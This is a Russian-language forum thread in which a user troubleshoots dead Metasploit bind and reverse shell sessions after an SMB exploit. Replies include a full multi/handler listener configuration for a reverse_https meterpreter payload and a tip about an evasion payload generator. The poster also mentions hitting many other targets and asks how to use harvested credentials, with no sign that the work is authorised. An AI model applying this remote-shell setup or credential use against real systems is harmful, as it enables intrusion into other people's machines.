Проблема Не работает shell

E

Elektrolife

Well-known member
21.10.2016
216
33
Всем привет!

Проблема следующая: на уязвимой машине поднимаю шелл ( windows/shell/bind_tcp). При попытке подключения метасплоит повисает в неопределенном состоянии и не даёт делать никаких действий кроме как выйти из сессии (ctr+c). Повысить сессию до meterpreter тоже завершается неудачей.

В чём может быть проблема ?

1517987100204.png


1517987188674.png


---- Добавлено позже ----

Каким то чудом пробился в сессию MP,но меню как то не очень похоже на привычное,сильно урезан функционал ( Почему ?

1517988816162.png


Посмотреть вложение 15523
 
Последнее редактирование:
E

Elektrolife

Well-known member
21.10.2016
216
33
windows/shell/bind_tcp не есть meterpreter
Поднял и шелл и метерпретер сессию. Шелл вообще не запускается,а МП какой то неполноценный. Набор команд ограниченный,пост модули не работают
 
woolf1514

woolf1514

Well-known member
06.03.2017
162
171
пробовал reverse_tcp вместо этого?
 
E

Elektrolife

Well-known member
21.10.2016
216
33
пробовал reverse_tcp вместо этого?
у меня нет статики,а через no-ip почему то сразу резолвит локальный адрес и не хочет обращаться через ddns

Ещё очень интересно,что это за урезанная версия МП и почему не работают команды
 
woolf1514

woolf1514

Well-known member
06.03.2017
162
171
E

Elektrolife

Well-known member
21.10.2016
216
33
так это вообще не МП)


По запросу session показывает что meterpreter ) По факту я думаю,что эксплоит отрабатывает но как то неправильно. Потому что сканнер показывает,что цель не подвержена эксплойту SMB,но тем не менее сессии прилетают )
 
kot-gor

kot-gor

Grey Team
07.09.2016
523
686
вообще это метерпретер...решили свою проблему?
 
OneDollar

OneDollar

Well-known member
07.09.2017
283
346
Хм, юзай phantom-evasion и не парься)
 
kot-gor

kot-gor

Grey Team
07.09.2016
523
686
дело не в полезной нагрузке..а в метасплойте самом...сам сталкивался с данным чудом.
у меня такое случалось когда настраивал ssl шифрования, и запускал листенер в фоном режиме , т.е exploit -J
 
E

Elektrolife

Well-known member
21.10.2016
216
33
вообще это метерпретер...решили свою проблему?
Не,так и не заработало (

---- Добавлено позже ----

Хм, юзай phantom-evasion и не парься)
Что есть phantom-evasion ? ) Предполагаю - генератор полезной нагрузки.

Тут проблема скорее в адекватном приёме сессии
 
Последнее редактирование:
OneDollar

OneDollar

Well-known member
07.09.2017
283
346
Не,так и не заработало (

---- Добавлено позже ----



Что есть phantom-evasion ? ) Предполагаю - генератор полезной нагрузки.

Тут проблема скорее в адекватном приёме сессии
Читай)Тык.. не ну если криво летит, то тут уже не в этом дело.. ты уверен что проброс портов в поряде и тд?
 
kot-gor

kot-gor

Grey Team
07.09.2016
523
686
а можете скинуть настройки листенера?
 
kot-gor

kot-gor

Grey Team
07.09.2016
523
686
у вас мертвая сессия..одна из причин неправильные настройки листенера.Вы в локальной сети проводили тестирование, или с внешней.?
 
E

Elektrolife

Well-known member
21.10.2016
216
33
у вас мертвая сессия..одна из причин неправильные настройки листенера.Вы в локальной сети проводили тестирование, или с внешней.?
Внешний белый IP, пробовал и реверс и бинд TCP
 
kot-gor

kot-gor

Grey Team
07.09.2016
523
686
через роутер или впс?
 
kot-gor

kot-gor

Grey Team
07.09.2016
523
686
вы использовали ReverseListenerBindAddress в листенере?
скиньте мне ваш листенер, более чем уверен вы там ошиблись.Дело в том, что если вы тестируете через роутер с белым статическим айпи настройки листенера немного другие..примерно так:

msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (внешний ip)
msf exploit (handler) > set LPORT 4444
msf exploit (handler) > set ReverseListenerBindAddress (внутренний IP)
msf exploit (handler) >exploit -j
 
  • Нравится
Реакции: Vertigo
E

Elektrolife

Well-known member
21.10.2016
216
33
вы использовали ReverseListenerBindAddress в листенере?
скиньте мне ваш листенер, более чем уверен вы там ошиблись.Дело в том, что если вы тестируете через роутер с белым статическим айпи настройки листенера немного другие..примерно так:

msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (внешний ip)
msf exploit (handler) > set LPORT 4444
msf exploit (handler) > set ReverseListenerBindAddress (внутренний IP)
msf exploit (handler) >exploit -j
блин,не могу найти теперь таргет,после него забабахал уже кучу других... По факту - я точно не указывал ReverseListenerBindAddress )

немножко оффтоп:

метасплоит накопал некоторое количество кредов,но я никак не пойму,как ими воспользоваться ) В браузере по указанным портам не выдаёт форму логина\пароля... Как он проверил их на валидность ?

1520417714474.png
 
Мы в соцсетях: